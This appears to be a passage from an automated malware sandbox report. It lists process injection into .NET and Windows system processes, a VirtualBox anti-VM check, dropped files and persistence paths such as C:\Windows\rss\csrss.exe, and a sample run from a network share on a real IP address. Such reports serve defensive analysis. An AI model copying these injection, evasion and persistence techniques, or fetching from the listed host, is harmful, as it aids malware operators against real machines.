File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\cache C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3988 set thread context of 3852 N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe
PID 4784 set thread context of 1368 N/A C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe
PID 4008 set thread context of 1396 N/A C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe
PID 2068 set thread context of 4136 N/A C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe C:\Users\Admin\Downloads\2023-11-23-12\4e888a7a812be647c1db3c45b41997976b81fcac54dbb3c2c53087518c036287.exe
PID 4664 set thread context of 2280 N/A C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe
PID 3552 set thread context of 4496 N/A C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe
PID 3940 set thread context of 364 N/A C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe
PID 4984 set thread context of 912 N/A C:\Users\Admin\AppData\Local\Temp\ghstve.exe C:\Users\Admin\AppData\Local\Temp\ghstve.exe
PID 3164 set thread context of 1400 N/A C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe
PID 4904 set thread context of 2544 N/A C:\Users\Admin\Downloads\2023-11-23-07\9967dbf940ce71c3aff8f0b62c7ef9324dd30e6ae4bbb2db4b16c0a184e383f7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 4764 set thread context of 2788 N/A C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\Order_Summary.exe C:\Windows\SysWOW64\cmd.exe
PID 3912 set thread context of 2392 N/A C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe
PID 6848 set thread context of 7848 N/A C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe
PID 6344 set thread context of 6752 N/A C:\Users\Admin\Downloads\2023-11-23-10\3cbd732d1d9b72c12fd0b5338f6ea6417ec2d242f258fedab71fe48cdadccc2a.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 8436 set thread context of 9208 N/A C:\Users\Admin\AppData\Local\Temp\1000078001\hv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 6640 set thread context of 9940 N/A C:\Users\Admin\Downloads\2023-11-23-11\107732c9883b6616b6c6398234d6e44843de70e8724023d62ca3e908019e58e0.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 10120 set thread context of 4832 N/A \??\UNC\62.173.141.116\scarica\paypal_inv.exe C:\Windows\SysWOW64\svchost.exe
PID 10892 set thread context of 8908 N/A C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe
PID 11360 set thread context of 11820 N/A C:\Windows\servicing\TrustedInstaller.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 9788 set thread context of 12212 N/A C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe
PID 8908 set thread context of 5560 N/A C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe
PID 8908 set thread context of 10612 N/A C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe C:\Windows\SysWOW64\help.exe
PID 10612 set thread context of 1384 N/A C:\Windows\SysWOW64\help.exe C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe
PID 11152 set thread context of 11372 N/A N/A C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe
PID 2392 set thread context of 11268 N/A C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe
PID 2392 set thread context of 11304 N/A C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe C:\Windows\SysWOW64\WerFault.exe
PID 2392 set thread context of 11772 N/A C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe
PID 11200 set thread context of 11428 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 11200 set thread context of 4488 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe
PID 10612 set thread context of 3168 N/A C:\Windows\SysWOW64\help.exe C:\Windows\Explorer.EXE
PID 10612 set thread context of 5892 N/A C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\explorer.exe
PID 10612 set thread context of 4488 N/A C:\Windows\SysWOW64\help.exe C:\Windows\explorer.exe
PID 10612 set thread context of 5908 N/A C:\Windows\SysWOW64\help.exe C:\Windows\explorer.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ClocX\Presets\Cappuccino.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\iSink.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\e91166fa-1788-4a44-b265-b9ed5860751d.tmp C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Lang\Polish.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\Aqua.bmp C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\69ddcba757bf72 C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe N/A
File created C:\Program Files (x86)\ClocX\Lang\Czech.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\BlueBallOnlyDots.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Sounds\ring2.mp3 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\black and steel.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\woodone\woodhour.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\Citizen.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\Alte Standuhr.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\BlueBallOnlyDots.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Lang\Traditional_Chinese.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\MClkhrHand.hpng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Lang\Ukrainian.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\MickeyClock.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Lang\Portuguese.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\UniversalAccess.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Lang\Greek.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Sounds\alert.mp3 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\BackupAlarms.bat C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\Comdex - Omega1.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\CarpeDiem.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\CarpeDiem.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\Verde.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\greenmarble\marblemin.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Lang\Indonesian.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall\secondhand-7.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Lang\Italiano.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\Verde.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\hallow.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Sounds\clockbell.mp3 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Lang\Korean.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\LongClock.bmp C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Lang\Nederlands.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\Nvidia.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\alarme.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\Original.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Lang\Japanese.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\MClkhrHand.hpng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\AquaB.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\VioletteKugler.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Lang\Espanol.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\CarpeDiem.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\aquamade.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Lang\Deutsch.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\klokje.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\wonderglobe2.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Lang\Suomi.lng C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\Alte Standuhr.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\Aqua.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\MickeyMouse.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\domeclock\domemin.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\UniversalAccessClock.bmp C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\negro2.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\BlueBallStd.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\GroenneKugler.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\iToolsClock.bmp C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File opened for modification C:\Program Files (x86)\ClocX\Presets\bahnhofsuhr.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\Octopye2.ini C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
File created C:\Program Files (x86)\ClocX\Presets\hallow2.png C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-8102A33C.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-5E46FA0D.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-A73FB9CB.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-0C84305E.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-156D43F1.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-E8196656.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\SMCONFIGINSTALLER.EXE-039D5D2E.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-AE5EC6E9.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-FDF50724.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\PfPre_95fc7101.mkd C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-0521102C.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-0A03C9B5.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\SGRMBROKER.EXE-0CA31CC6.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\SLUI.EXE-724E99D9.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\Prefetch\BACKGROUNDTASKHOST.EXE-145A3777.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-08AF006C.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-23EA2E5B.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-61696F68.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-7C77C512.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-D9106866.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\AgAppLaunch.db C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\NKHNNN.EXE-30BEADEF.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-56E309E9.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-7194EF5E.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-E66A223C.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-FFCC5BB3.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-98C67737.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\WMIC.EXE-A7D06383.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-18665B15.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-641DCE1C.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-7E8D1C35.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-72C0C855.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-B1A87C0F.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\SEARCHAPP.EXE-840F7E5A.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File created C:\Windows\Tasks\IgmMCWhKsLGKjacyM.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-28A8211F.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\NGEN.EXE-AE594A6B.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-CABA5DBC.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\TASKHOSTW.EXE-3E0B74C8.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\TRUSTEDINSTALLER.EXE-3CC531E5.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\WFSERVICESREG.EXE-766D3C5B.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\MICROSOFTEDGEUPDATE.EXE-C4317749.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-3ED30A86.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-D8E67ED6.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\ReadyBoot\ReadyBoot.etl C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-9B2E43E1.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-C49E779A.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
File opened for modification C:\Windows\Prefetch\DLLHOST.EXE-504C779A.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\LINQWEBCONFIG.EXE-0FDCD1CB.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\MOBSYNC.EXE-C5E2284F.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\ONEDRIVE.EXE-96969DDA.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\POWERSHELL.EXE-920BBA2A.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-D2B15AE2.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-4EFE6110.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNTIMEBROKER.EXE-06226CEB.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\SHELLEXPERIENCEHOST.EXE-A3608B1E.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-25616620.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\SVCHOST.EXE-DF3D779F.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\TASKKILL.EXE-8F5B2253.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\FILESYNCCONFIG.EXE-CB60E6FA.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\RUNDLL32.EXE-99F89D15.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
File opened for modification C:\Windows\Prefetch\SHUTDOWN.EXE-E7D5C9CC.pf C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
